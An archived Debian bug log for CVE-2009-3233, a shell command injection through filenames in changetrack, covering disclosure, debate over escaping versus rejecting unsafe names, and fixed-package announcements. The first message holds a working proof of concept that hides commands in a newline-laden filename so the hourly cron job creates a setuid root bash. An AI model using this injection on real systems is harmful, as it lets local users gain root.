Debian Bug report logs - #546791
CVE-2009-3233: shell command injection via filename

version graph

Package: changetrack; Maintainer for changetrack is Debian QA Group <packages@qa.debian.org>; Source for changetrack is src:changetrack.

Reported by: Marek Grzybowski <marek.grzybowski@atm.com.pl>

Date: Tue, 15 Sep 2009 19:27:04 UTC

Severity: grave

Tags: security

Found in version changetrack/4.3-3

Fixed in versions changetrack/4.5-2, changetrack/4.3-3+etch1, changetrack/4.3-3+lenny1

Done: Jens Peter Secher <jps@debian.org>

Bug is archived. No further changes may be made.

Toggle useless messages

View this report as an mbox folder, status mbox, maintainer mbox


Report forwarded to debian-bugs-dist@lists.debian.org, team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Jens Peter Secher <jps@debian.org>:
Bug#546791; Package changetrack. (Tue, 15 Sep 2009 19:27:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
New Bug report received and forwarded. Copy sent to team@security.debian.org, secure-testing-team@lists.alioth.debian.org, Jens Peter Secher <jps@debian.org>. (Tue, 15 Sep 2009 19:27:07 GMT) Full text and rfc822 format available.

Message #5 received at submit@bugs.debian.org (full text, mbox):

From: Marek Grzybowski <marek.grzybowski@atm.com.pl>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: changetrack: shell command injection via filename
Date: Tue, 15 Sep 2009 21:23:28 +0200
Package: changetrack
Version: 4.3-3
Severity: grave
Tags: security
Justification: user security hole



-- System Information:
Debian Release: 5.0.2
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 2.6.26-2-openvz-amd64 (SMP w/3 CPU cores)
Locale: LANG=pl_PL.UTF-8, LC_CTYPE=pl_PL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages changetrack depends on:
ii  libfile-ncopy-perl            0.34-1     file copying like cp for perl
ii  perl                          5.10.0-19  Larry Wall's Practical Extraction 

Versions of packages changetrack recommends:
ii  cron                          3.0pl1-105 management of regular background p
ii  ed                            0.7-3      The classic unix line editor

changetrack suggests no packages.

-- no debconf information


Its is posible, to run commands as root, if you have permision to create
files in directory chcked via changetrack, example:

mkdir  /etc/test
touch  "/etc/test/sth
echo commmand u like most
cd ..
cd ..
cd ..
cd ..
cd bin
cp bash  bash.ultimate
chmod  ug+s bash.ultimate
"

echo "/etc/test/*" >> /etc/changetrack.conf

wait for /etc/cron.hourly/changetrack

# ls -al /bin/bash.ultimate
-rwsr-sr-x 1 root root 797784 wrz 15 20:52 /bin/bash.ultimate


bash.ultimate -p ;)


Probably changetrack shudnot use shell commands, or escape sh special
haracters like spaces enters ; etc...

-- 
  Regards
      Marek Grzybowski




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Wed, 16 Sep 2009 19:42:11 GMT) Full text and rfc822 format available.

Message #8 received at 546791-submitter@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-submitter@bugs.debian.org
Subject: changetrack: shell command injection via filename
Date: Wed, 16 Sep 2009 21:39:20 +0200
Thanks for the bug report.

I am considering applying the following fix:

	if( "$realfile" =~ m/[\r\n\f<>`\$]/ ) {
		if(!$opt_q)
		{ print "Skipping non-sane filename '$realfile'\n";}
		@diff = (@diff, "Non-sane: '$realfile'\n");
		next;
	}
				
for outright rejecting weird filenames.  Can you come up with other
problematic characters in filenames?


Cheers,
-- 
                                                    Jens Peter Secher.
_DD6A 05B0 174E BFB2 D4D9 B52E 0EE5 978A FE63 E8A1 jpsecher gmail com_.
A. Because it breaks the logical sequence of discussion.
Q. Why is top posting bad?




Information forwarded to debian-bugs-dist@lists.debian.org, Jens Peter Secher <jps@debian.org>:
Bug#546791; Package changetrack. (Thu, 17 Sep 2009 07:42:26 GMT) Full text and rfc822 format available.

Acknowledgement sent to Giuseppe Iuculano <giuseppe@iuculano.it>:
Extra info received and forwarded to list. Copy sent to Jens Peter Secher <jps@debian.org>. (Thu, 17 Sep 2009 07:42:27 GMT) Full text and rfc822 format available.

Message #13 received at 546791@bugs.debian.org (full text, mbox):

From: Giuseppe Iuculano <giuseppe@iuculano.it>
To: 546791@bugs.debian.org
Cc: control@bugs.debian.org, 546791-subscribe@bugs.debian.org
Subject: CVE-2009-3233: shell command injection via filename
Date: Thu, 17 Sep 2009 09:19:20 +0200
[Message part 1 (text/plain, inline)]
retitle 546791 CVE-2009-3233: shell command injection via filename
thanks

Hi,

this issue got a CVE id:

Name: CVE-2009-3233
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3233
Reference: MLIST:[oss-security] 20090916 CVE id request: changetrack
Reference: URL:http://www.openwall.com/lists/oss-security/2009/09/16/3
Reference: CONFIRM:http://bugs.debian.org/546791
Reference: BID:36420
Reference: URL:http://www.securityfocus.com/bid/36420
Reference: SECUNIA:36756
Reference: URL:http://secunia.com/advisories/36756

changetrack 4.3 allows local users to execute arbitrary commands via
CRLF sequences and shell metacharacters in a filename in a directory
that is checked by changetrack.

Please coordinate with the security team (team@security.debian.org) to
prepare packages for the stable and oldstable releases.

If you fix the vulnerability please also make sure to include the
CVE id in your changelog entry.

Cheers,
Giuseppe.

[signature.asc (application/pgp-signature, attachment)]

Changed Bug title to 'CVE-2009-3233: shell command injection via filename' from 'changetrack: shell command injection via filename' Request was from Giuseppe Iuculano <giuseppe@iuculano.it> to control@bugs.debian.org. (Thu, 17 Sep 2009 07:42:32 GMT) Full text and rfc822 format available.

Information stored :
Bug#546791; Package changetrack. (Thu, 17 Sep 2009 08:18:07 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Extra info received and filed, but not forwarded. (Thu, 17 Sep 2009 08:18:07 GMT) Full text and rfc822 format available.

Message #20 received at 546791-quiet@bugs.debian.org (full text, mbox):

From: Marek Grzybowski <marek.grzybowski@atm.com.pl>
To: Jens Peter Secher <jps@debian.org>, <546791-quiet@bugs.debian.org>
Cc: <546791-submitter@bugs.debian.org>, Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 10:12:01 +0200
Jens Peter Secher pisze:
> Thanks for the bug report.
> 
> I am considering applying the following fix:
> 
> 	if( "$realfile" =~ m/[\r\n\f<>`\$]/ ) {
> 		if(!$opt_q)
> 		{ print "Skipping non-sane filename '$realfile'\n";}
> 		@diff = (@diff, "Non-sane: '$realfile'\n");
> 		next;
> 	}
> 				
> for outright rejecting weird filenames.  Can you come up with other
> problematic characters in filenames?

Thanks for reply.


Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs should be safe to:

His patch:

--- changetrack.orig	2009-09-16 17:59:55.000000000 +0200
+++ changetrack	2009-09-16 18:00:01.000000000 +0200
@@ -224,6 +224,10 @@
 	}
 	$yestfile = $compfile . ".yesterday";     # stores current data
 	
+	my $yestfile_esc = &escape_shell_chars ($yestfile);
+        my $realfile_esc = &escape_shell_chars ($realfile);
+	my $compfile_esc = &escape_shell_chars ($compfile);
+	
 	if( ! -r "$yestfile" ) {             # can't open yesterday, doesn't exist.
 	    @diff = (@diff, "New file $realfile\n");
 	    if($opt_e) {
@@ -243,12 +247,12 @@
 	    printf STAT "%o\n%s\n%s\n", $filemode, $fileuid, $filegid;
 	    close(STAT);
 	    if(!$opt_r) {
-		`cp $realfile $compfile`;
+		`cp $realfile_esc $compfile_esc`;
 		chdir($historypath);
-		`co $rcs_quiet $compfile`; # hack to make rcs work.
-		system("rcs $rcs_quiet -i -t-'this is $realfile' $compfile");
-		`rcs $rcs_quiet -U $compfile`;
-		`rm $compfile -f`;
+		`co $rcs_quiet $compfile_esc`; # hack to make rcs work.
+		system("rcs $rcs_quiet -i -t-'this is $realfile_esc' $compfile_esc");
+		`rcs $rcs_quiet -U $compfile_esc`;
+		`rm $compfile_esc -f`;
 	    }
 	}
 	
@@ -295,7 +299,10 @@
 	    close(STAT);
 	}

-	open(DIFF, "diff $diffargs $yestfile $realfile |") or die "Exiting: can't run diff:$!\n";
+	if ($realfile_esc =~ /test/) {
+	    print "$realfile_esc\n";
+	}
+	open(DIFF, "diff $diffargs $yestfile_esc $realfile_esc |") or die "Exiting: can't run diff:$!\n";
 	
 	if(!$opt_q) {
 	    print "$realfile";};
@@ -314,7 +321,7 @@
 	close(DIFF);
 	
 	if($diff) {
-	    open(DIFF, "diff -e $yestfile $realfile |") or die "Can't do diff -e:$!\n";
+	    open(DIFF, "diff -e $yestfile_esc $realfile_esc |") or die "Can't do diff -e:$!\n";
 	    # use -e to create ed commands
 	    while(<DIFF>) {
 		@ed = (@ed,"$_");                 # get the 'ed'-styled diffs. No need to understand them.
@@ -385,12 +392,12 @@
 		chdir($historypath) or die "Can't chdir to $historypath for ci: $!\n";
 		my $quiet = "";
 		print "cp $realfile $compfile\n" unless defined($opt_q);
-		`co $compfile`; # hack to make rcs work here too!
-		`cp $realfile $compfile`;         # make backup copy
+		`co $compfile_esc`; # hack to make rcs work here too!
+		`cp $realfile_esc $compfile_esc`;         # make backup copy
 		#`mv $realfile $realfile.track`;  # copy backwards, to keep modification date
 		#`cp $realfile.track $realfile`;  # make backup copy
-		system("ci $rcs_quiet -m'modification of $realfile on $date' -l $compfile");
-		`rm $compfile`;
+		system("ci $rcs_quiet -m'modification of $realfile_esc on $date' -l $compfile_esc");
+		`rm $compfile_esc`;
 	    }
 	}
     }
@@ -438,6 +445,16 @@
     }
 }

+#
+# escape shell meta characters and spaces
+sub escape_shell_chars
+{
+    my $arg = shift;
+    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
+    return $arg;
+}
+
+
 # $Log: changetrack,v $
 # Revision 4.3  2005/02/28 16:50:23  cjmorlan
 # Removed debugging lines!




it's all of them ? We don't know ;)


-- 
Regards
Marek Grzybowski




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Thu, 17 Sep 2009 08:18:09 GMT) Full text and rfc822 format available.

Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Thu, 17 Sep 2009 17:51:07 GMT) Full text and rfc822 format available.

Message #26 received at 546791-submitter@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-submitter@bugs.debian.org
Cc: Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 19:43:57 +0200
2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
>
> Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs should be safe to:
>
> His patch:
>
[...]
> +        my $realfile_esc = &escape_shell_chars ($realfile);
[...]
> -               `cp $realfile $compfile`;
> +               `cp $realfile_esc $compfile_esc`;
[...]
> +sub escape_shell_chars
> +{
> +    my $arg = shift;
> +    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
> +    return $arg;
> +}

This is not going work.  When $realfile_esc is different from
$realfile, then it makes no sense to copy the non-existent
$realfile_esc.  I will go for the solution of rejecting weird file
names.

Cheers,
-- 
                                                    Jens Peter Secher.
_DD6A 05B0 174E BFB2 D4D9 B52E 0EE5 978A FE63 E8A1 jpsecher gmail com_.
A. Because it breaks the logical sequence of discussion.
Q. Why is top posting bad?




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Thu, 17 Sep 2009 21:03:04 GMT) Full text and rfc822 format available.

Message #29 received at 546791-submitter@bugs.debian.org (full text, mbox):

From: "Andrzej Lemieszek (ATM S.A.)" <andrzej.lemieszek@atm.com.pl>
To: Jens Peter Secher <jps@debian.org>
Cc: 546791-submitter@bugs.debian.org
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 22:54:37 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Jens Peter Secher pisze:
> 2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
>> Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs should be safe to:
>>
>> His patch:
>>
> [...]
>> +        my $realfile_esc = &escape_shell_chars ($realfile);
> [...]
>> -               `cp $realfile $compfile`;
>> +               `cp $realfile_esc $compfile_esc`;
> [...]
>> +sub escape_shell_chars
>> +{
>> +    my $arg = shift;
>> +    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
>> +    return $arg;
>> +}
> 
> This is not going work.  When $realfile_esc is different from
> $realfile, then it makes no sense to copy the non-existent
> $realfile_esc.  I will go for the solution of rejecting weird file
> names.
I'm sorry, but it works. $realfile_esc is translated back by shell to
it's original filename and target program (cp in this case) opens $realfile.

Of course, rejecting weird names is also solution, but after such modification changetrack
still will not handle correctly files with characters mentioned above ( sometimes these filenames
are created by not malicious user e.g. filenames with spaces)


- --
Andrzej Lemieszek - Zespół Wsparcia Systemów i Aplikacji
ATM S.A., ul. Grochowska 21a, 04-186 Warszawa, Poland; http://www.atm.com.pl
tel. +48 22 5156357;  PGP key ID: 0xD8A5913F
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iGUEARECACUFAkqyofceGGhrcDovL3Bvb2wuc2tzLWtleXNlcnZlcnMubmV0AAoJ
EFA6R1rYpZE/rS0An0HMDJS4CRgP0NCm7eIVpAwyqT9GAJ9VP7LSuKvprN9kbi10
KhbumazHbw==
=c4HU
-----END PGP SIGNATURE-----




Information stored :
Bug#546791; Package changetrack. (Thu, 17 Sep 2009 21:54:03 GMT) Full text and rfc822 format available.

Acknowledgement sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Extra info received and filed, but not forwarded. (Thu, 17 Sep 2009 21:54:03 GMT) Full text and rfc822 format available.

Message #34 received at 546791-quiet@bugs.debian.org (full text, mbox):

From: Marek Grzybowski <marek.grzybowski@atm.com.pl>
To: Jens Peter Secher <jps@debian.org>, 546791-quiet@bugs.debian.org
Cc: 546791-submitter@bugs.debian.org, Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Thu, 17 Sep 2009 23:49:15 +0200
Jens Peter Secher wrote:
> 2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
>> Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs should be safe to:
>>
>> His patch:
>>
> [...]
>> +        my $realfile_esc = &escape_shell_chars ($realfile);
> [...]
>> -               `cp $realfile $compfile`;
>> +               `cp $realfile_esc $compfile_esc`;
> [...]
>> +sub escape_shell_chars
>> +{
>> +    my $arg = shift;
>> +    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
>> +    return $arg;
>> +}
> 
> This is not going work.  When $realfile_esc is different from
> $realfile, then it makes no sense to copy the non-existent
> $realfile_esc.  I will go for the solution of rejecting weird file
> names.

You right Jeans, it's no good enought witch "enters",

I also chcked ./bashline.c in bash sources:

 /* characters that need to be quoted when appearing in filenames. */
  rl_filename_quote_characters = " \t\n\\\"'@<>=;|&()#$`?*[!:{";        /*}*/

i do some tests, and come up witch this :
$ cat  test.pl
#!/usr/bin/perl
use File::NCopy qw(copy);

# test file name
my $realfile="blablabla \t\n\\\"'@<>=;|&()#\$`?*[!:{";

my $realfile_esc = &escape_shell_chars ($realfile);

sub escape_shell_chars
{
    my $arg = shift;
    $arg =~ s/[']/\'\\$&'/g;
    return "'".$arg."'";
}

print "$realfile\n";
print "$realfile_esc\n";

copy( "test.pl" , $realfile);
print `set -x cp test.pl $realfile_esc`




-- 
Pozdrawiam
   Marek Grzybowski




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Thu, 17 Sep 2009 21:54:05 GMT) Full text and rfc822 format available.

Reply sent to Jens Peter Secher <jps@debian.org>:
You have taken responsibility. (Thu, 17 Sep 2009 22:39:43 GMT) Full text and rfc822 format available.

Notification sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug acknowledged by developer. (Thu, 17 Sep 2009 22:39:43 GMT) Full text and rfc822 format available.

Message #42 received at 546791-close@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-close@bugs.debian.org
Subject: Bug#546791: fixed in changetrack 4.5-2
Date: Thu, 17 Sep 2009 22:18:08 +0000
Source: changetrack
Source-Version: 4.5-2

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.5-2.diff.gz
  to pool/main/c/changetrack/changetrack_4.5-2.diff.gz
changetrack_4.5-2.dsc
  to pool/main/c/changetrack/changetrack_4.5-2.dsc
changetrack_4.5-2_all.deb
  to pool/main/c/changetrack/changetrack_4.5-2_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 546791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <jps@debian.org> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.5-2
Distribution: unstable
Urgency: low
Maintainer: Jens Peter Secher <jps@debian.org>
Changed-By: Jens Peter Secher <jps@debian.org>
Description: 
 changetrack - monitor changes to (configuration) files
Closes: 546791
Changes: 
 changetrack (4.5-2) unstable; urgency=low
 .
   * [reject-weird-filenames.diff] Fix possible local exploit by rejecting
     filenames with unsafe characters (cf. CVE-2009-3233).  Thanks to Marek
     Grzybowski and Andrzej Lemieszek.
     (Closes: #546791)
Checksums-Sha1: 
 3f8c484862fe780799cb222e9e167060f816380d 1203 changetrack_4.5-2.dsc
 dd2276879e4e4978bcd8719305257883110c283b 13966 changetrack_4.5-2.diff.gz
 bd6371b033eb49bb87c3671c6c8a62df1331f0b0 22160 changetrack_4.5-2_all.deb
Checksums-Sha256: 
 66ae538c9a129c6cde8d5030a367990d885cc2f8e340641fb2fabd5d649264c3 1203 changetrack_4.5-2.dsc
 8c43f60545ad78d1c42605f7e507121c4e2d607d0bf280cbd56c518a0ceb1343 13966 changetrack_4.5-2.diff.gz
 e25d8c2c03e2a821025b9afe3da60dcd4e13d8827420f315ab898c891c7ee0d4 22160 changetrack_4.5-2_all.deb
Files: 
 6453dd7fb96ed8f2cc5cf00b6a4e305a 1203 utils optional changetrack_4.5-2.dsc
 28ed49102de02d769d67315616be21d0 13966 utils optional changetrack_4.5-2.diff.gz
 489f18c7e76e6f00db07691d0ad178ef 22160 utils optional changetrack_4.5-2_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)

iJwEAQECAAYFAkqynasACgkQiFVdEFPVQL/C1AQAw56DBodzOh/hxvp9I3bBMi39
tYXGDnAyDF/6XkAf3zOvm5pAbuVTmazucEeiTvU+z6nNywKY71fnzEGQOaEqm5Vd
draYAes9ibVdpC+FB5Ps870gBMrJxO10tp+4oYp4s0w7ocwX8kECRAlmf4GTb1pX
rQqRLf/e6zeebf0m4hc=
=gUE0
-----END PGP SIGNATURE-----





Information stored :
Bug#546791; Package changetrack. (Fri, 18 Sep 2009 00:36:14 GMT) Full text and rfc822 format available.

Acknowledgement sent to Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>:
Extra info received and filed, but not forwarded. (Fri, 18 Sep 2009 00:36:14 GMT) Full text and rfc822 format available.

Message #47 received at 546791-quiet@bugs.debian.org (full text, mbox):

From: Andrzej Lemieszek <andrzej.lemieszek@atm.com.pl>
To: Marek Grzybowski <marek.grzybowski@atm.com.pl>
Cc: Jens Peter Secher <jps@debian.org>, 546791-quiet@bugs.debian.org, 546791-submitter@bugs.debian.org
Subject: Re: Bug#546791: changetrack: shell command injection via filename
Date: Fri, 18 Sep 2009 02:25:29 +0200
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Marek Grzybowski pisze:
> Jens Peter Secher wrote:
>> 2009/9/17 Marek Grzybowski <marek.grzybowski@atm.com.pl>:
(...)
>>> Andrzej Lemieszek (in CC) found few more, and He escaped them, so use rcs should be safe to:
>>>
>>> His patch:
>>>
>> [...]
>>> +        my $realfile_esc = &escape_shell_chars ($realfile);
>> [...]
>>> -               `cp $realfile $compfile`;
>>> +               `cp $realfile_esc $compfile_esc`;
>> [...]
>>> +sub escape_shell_chars
>>> +{
>>> +    my $arg = shift;
>>> +    $arg =~ s/[;<>\*\|`&\$!#\(\)\[\]\{\}:'"\s]/\\$&/g;
>>> +    return $arg;
>>> +}
>> This is not going work.  When $realfile_esc is different from
>> $realfile, then it makes no sense to copy the non-existent
>> $realfile_esc.  I will go for the solution of rejecting weird file
>> names.
> 
> You right Jeans, it's no good enought witch "enters",
> 
> I also chcked ./bashline.c in bash sources:
> 
>  /* characters that need to be quoted when appearing in filenames. */
>   rl_filename_quote_characters = " \t\n\\\"'@<>=;|&()#$`?*[!:{";        /*}*/
> 
> i do some tests, and come up witch this :
Yeah, Marku, you are right. I didn't test my patch with newline characters (I used semicolons for
testing your exploit), so I didn't notice that newline is a "special case" of special characters
(see bash(1), section QUOTING) and can't be easly quoted using backslash

Your solution using single quotes is much better ( it smartly overrides the limitation of single
quotes - that inside single quoted string single quotes can't be escaped), In the shorter form it
can look like this:

sub escape_shell_chars
{
    my $arg = shift;
    $arg =~ s/'/'\\''/g;
    return "'$arg'";
}

- --
Andrzej Lemieszek
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)

iGUEARECACUFAkqy03keGGhrcDovL3Bvb2wuc2tzLWtleXNlcnZlcnMubmV0AAoJ
EFA6R1rYpZE/eGUAn38bCS8TccE82Tg2VZ+beXhIfIpQAJ9q4FO4jF0GxOCXT67Z
KHqOeLq8gQ==
=wiP3
-----END PGP SIGNATURE-----




Message sent on to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug#546791. (Fri, 18 Sep 2009 00:36:15 GMT) Full text and rfc822 format available.

Reply sent to Jens Peter Secher <jps@debian.org>:
You have taken responsibility. (Thu, 24 Sep 2009 02:36:03 GMT) Full text and rfc822 format available.

Notification sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug acknowledged by developer. (Thu, 24 Sep 2009 02:36:03 GMT) Full text and rfc822 format available.

Message #55 received at 546791-close@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-close@bugs.debian.org
Subject: Bug#546791: fixed in changetrack 4.3-3+etch1
Date: Thu, 24 Sep 2009 01:57:50 +0000
Source: changetrack
Source-Version: 4.3-3+etch1

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.3-3+etch1.diff.gz
  to pool/main/c/changetrack/changetrack_4.3-3+etch1.diff.gz
changetrack_4.3-3+etch1.dsc
  to pool/main/c/changetrack/changetrack_4.3-3+etch1.dsc
changetrack_4.3-3+etch1_all.deb
  to pool/main/c/changetrack/changetrack_4.3-3+etch1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 546791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <jps@debian.org> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.7
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+etch1
Distribution: oldstable-security
Urgency: medium
Maintainer: Jens Peter Secher <jps@debian.org>
Changed-By: Jens Peter Secher <jps@debian.org>
Description: 
 changetrack - configuration-file change tracker
Closes: 546791
Changes: 
 changetrack (4.3-3+etch1) oldstable-security; urgency=medium
 .
   * Fix possible local exploit by rejecting filenames with unsafe
     characters (cf. CVE-2009-3233).  Thanks to Marek Grzybowski and
     Andrzej Lemieszek.
     (Closes: #546791)
Files: 
 b519ffa08cb165819e9bdd67f7e9a4f3 710 utils optional changetrack_4.3-3+etch1.dsc
 3334d9ef744a08cc0b4d8253c78b7c10 13330 utils optional changetrack_4.3-3+etch1.diff.gz
 b1002889940ab122879f4d709fe8a573 21706 utils optional changetrack_4.3-3+etch1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)

iJwEAQECAAYFAkq2Zp8ACgkQiFVdEFPVQL/TagP9EUfyPWHxaOg+1R12oD3GBpGo
KT/avbj+06eCCQMwgBUdSpPYN/BBdV7N/xL67/sVk2NBMlm8vCcuQlj851t2DHU3
7M/A4R1rgMRybh0gT62MWdpaNs4OonhgKdangO5CWmUq1gD7G+Lc9+T5H15dU/pB
/r8CnXxEzHf+7tQrsFk=
=fCDZ
-----END PGP SIGNATURE-----





Reply sent to Jens Peter Secher <jps@debian.org>:
You have taken responsibility. (Wed, 16 Dec 2009 23:42:03 GMT) Full text and rfc822 format available.

Notification sent to Marek Grzybowski <marek.grzybowski@atm.com.pl>:
Bug acknowledged by developer. (Wed, 16 Dec 2009 23:42:03 GMT) Full text and rfc822 format available.

Message #60 received at 546791-close@bugs.debian.org (full text, mbox):

From: Jens Peter Secher <jps@debian.org>
To: 546791-close@bugs.debian.org
Subject: Bug#546791: fixed in changetrack 4.3-3+lenny1
Date: Wed, 16 Dec 2009 23:38:46 +0000
Source: changetrack
Source-Version: 4.3-3+lenny1

We believe that the bug you reported is fixed in the latest version of
changetrack, which is due to be installed in the Debian FTP archive:

changetrack_4.3-3+lenny1.diff.gz
  to main/c/changetrack/changetrack_4.3-3+lenny1.diff.gz
changetrack_4.3-3+lenny1.dsc
  to main/c/changetrack/changetrack_4.3-3+lenny1.dsc
changetrack_4.3-3+lenny1_all.deb
  to main/c/changetrack/changetrack_4.3-3+lenny1_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 546791@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Jens Peter Secher <jps@debian.org> (supplier of updated changetrack package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Format: 1.8
Date: Thu, 17 Sep 2009 22:32:43 +0200
Source: changetrack
Binary: changetrack
Architecture: source all
Version: 4.3-3+lenny1
Distribution: stable-security
Urgency: medium
Maintainer: Jens Peter Secher <jps@debian.org>
Changed-By: Jens Peter Secher <jps@debian.org>
Description: 
 changetrack - configuration-file change tracker
Closes: 546791
Changes: 
 changetrack (4.3-3+lenny1) stable-security; urgency=medium
 .
   * Fix possible local exploit by rejecting filenames with unsafe
     characters (cf. CVE-2009-3233).  Thanks to Marek Grzybowski and
     Andrzej Lemieszek.
     (Closes: #546791)
Checksums-Sha1: 
 4645f9452c04d593cf24cfb49da6c22594b8143a 1110 changetrack_4.3-3+lenny1.dsc
 820410611c2520f39653b9f50f149dfa632a421e 16567 changetrack_4.3.orig.tar.gz
 0fcd2813562a9942189fbd1eeeee2f39848bc4fb 13325 changetrack_4.3-3+lenny1.diff.gz
 f1afc814784c9f1975c94610fb55bb89a58ad841 21678 changetrack_4.3-3+lenny1_all.deb
Checksums-Sha256: 
 e106ada0d20a1afeb86d1c5e840b83b3f0bc3001c1f3621bbbbc87b2da1900e3 1110 changetrack_4.3-3+lenny1.dsc
 016d7817dcc6840ae50d9f4a1917679087765b7985cfc5eb088d68b8270ff5c7 16567 changetrack_4.3.orig.tar.gz
 defe00ae7b26f299437b8a18dabed1e0568fe3fe8aaf96af9e6793d9fa221a08 13325 changetrack_4.3-3+lenny1.diff.gz
 12f0d22ad6f56e3798c4547656a6bfc7962de09b67192a69734b9c9fdbfd199c 21678 changetrack_4.3-3+lenny1_all.deb
Files: 
 5e689f11bc4dca83328cda0a888ec1e4 1110 utils optional changetrack_4.3-3+lenny1.dsc
 7600e72b299562c6773e9b6ac38aaa55 16567 utils optional changetrack_4.3.orig.tar.gz
 c91d4a3d370dfe41ff41e6815eda7440 13325 utils optional changetrack_4.3-3+lenny1.diff.gz
 3b9fb111a49aa671886f6e5eaec66908 21678 utils optional changetrack_4.3-3+lenny1_all.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10rc1 (GNU/Linux)

iJwEAQECAAYFAkq2ZAkACgkQiFVdEFPVQL90WAQAwSBJo6ZUl4A+IrDU4go0GdE3
ZG9fOXw2ddxKysp02M/11SpFMRhIQcN5di8i+jMyZKRjnFjtnO4tVK985r+owbI0
XHfrENbzoEl8Am5PCXD1WwG6N4nnfb+AOdPtX3GyNpNV+Me+of0in+AKBaEPIoN8
f3W6ZehlsUWZk/MRoxM=
=Gd/E
-----END PGP SIGNATURE-----





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Sun, 31 Jan 2010 07:42:22 GMT) Full text and rfc822 format available.

Send a report that this bug log contains spam.


Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Sat Apr 19 10:57:08 2014; Machine Name: beach.debian.org

Debian Bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.